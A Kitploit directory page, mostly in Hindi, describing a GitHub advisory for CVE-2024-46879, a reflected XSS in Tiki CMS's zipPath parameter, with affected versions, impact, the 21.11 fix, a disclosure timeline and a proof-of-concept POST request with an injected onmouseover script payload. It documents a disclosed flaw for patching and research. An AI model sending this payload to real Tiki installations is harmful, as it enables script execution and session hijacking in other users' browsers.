Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/coldfusionx/cve-2024-46879-tikicms-xss
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcoldfusionx/cve-2024-46879-tikicms-xss

CVE-2024-46879-TikiCMS-XSS

CVE-2024-46879 - Tiki CMS परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-46879 - Tiki CMS परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता

Tiki CMS - 'zipPath' पैरामीटर परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता

अस्वीकरण

केवल शैक्षिक, अनुसंधान और रक्षात्मक उद्देश्यों के लिए अभिप्रेत है। बिना अनुमति के सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध है।

सारांश

Tiki के संस्करण 21.11 से पहले के संस्करणों में tiki-admin_system.php के POST अनुरोध डेटा zipPath में एक परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है। यह भेद्यता हमलावरों को एक क्राफ्टेड पेलोड के माध्यम से मनमाना जावास्क्रिप्ट कोड निष्पादित करने की अनुमति देती है, जिससे संवेदनशील जानकारी तक संभावित पहुंच या अनधिकृत कार्य हो सकते हैं।

प्रभावित उत्पाद

  • उत्पाद: Tiki CMS Groupware
  • संस्करण: 21.11 से पहले के
  • घटक: tiki-admin_system.php

भेद्यता विवरण

यह भेद्यता tiki-admin_system.php में zipPath पैरामीटर के अनुचित इनपुट सैनिटाइजेशन के कारण होती है। उपयोगकर्ता द्वारा प्रदान किया गया इनपुट पर्याप्त एन्कोडिंग के बिना HTTP प्रतिक्रिया में परावर्तित होता है, जिससे इंजेक्ट किए गए जावास्क्रिप्ट के निष्पादन की अनुमति मिलती है।

प्रभाव

एक प्रमाणित हमलावर को एक क्राफ्टेड अनुरोध के माध्यम से किसी अन्य उपयोगकर्ता के ब्राउज़र में मनमाना जावास्क्रिप्ट निष्पादित करने की अनुमति देता है, जिससे संभावित रूप से सत्र अपहरण या अनधिकृत कार्य हो सकते हैं।

प्रूफ ऑफ कॉन्सेप्ट (PoC)

अनुरोध

root@kitploit:~
POST /tiki-admin_system.php HTTP/1.1
Referer: http://127.0.0.1:9080/ 
Cookie: wiki_plugin_edit_view=true; tabs=%40tabs_wikipages%3A2%40admin_look%3A2%40admin_general%3A3; show_details=n; preview=%40preview_diff_style%3A; local_tz=Asia%2FCalcutta; javascript_enabled=y; PHPSESSID=120ab2736ae548eda9efcd2c862ac76c; PHPSESSIDCV=JHSjEwiO2tLPDG5yIJ2DQw%3D%3D
Host: 127.0.0.1:9080 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15 
Accept: */* 
Content-Length: 94
Content-Type: application/x-www-form-urlencoded 

zipPath=%22'%3E<div%20on<svg/onmouseover="alert(document.domain)">Coldfx</div>"%20/%3E&zip=1

poc

उपचार

यह मुद्दा Tiki CMS Groupware संस्करण 21.11 में संबोधित किया गया है। उपयोगकर्ताओं को सलाह दी जाती है कि वे इस या बाद के पैच किए गए संस्करण में अपग्रेड करें।

विक्रेता संदर्भ: https://tiki.org/article515-New-Security-Update-Released-for-Tiki-21-x-LTS-and-Upgrade-is-Strongly-Recommended

समयरेखा

  • विक्रेता को रिपोर्ट किया गया: 5 सितंबर, 2024
  • विक्रेता स्वीकृति: 16 सितंबर, 2024
  • संस्करण 21.11 में फिक्स: 3 जनवरी, 2025
  • सार्वजनिक प्रकटीकरण (इस रिपॉजिटरी के माध्यम से): 23 मार्च, 2026

श्रेय

  • शीला सर्वा, Qualys
  • मयंक देशमुख, Qualys

संदर्भ

  • https://www.cve.org/CVERecord?id=CVE-2024-46879
  • https://tiki.org/article515-New-Security-Update-Released-for-Tiki-21-x-LTS-and-Upgrade-is-Strongly-Recommended
टूल डाउनलोड करें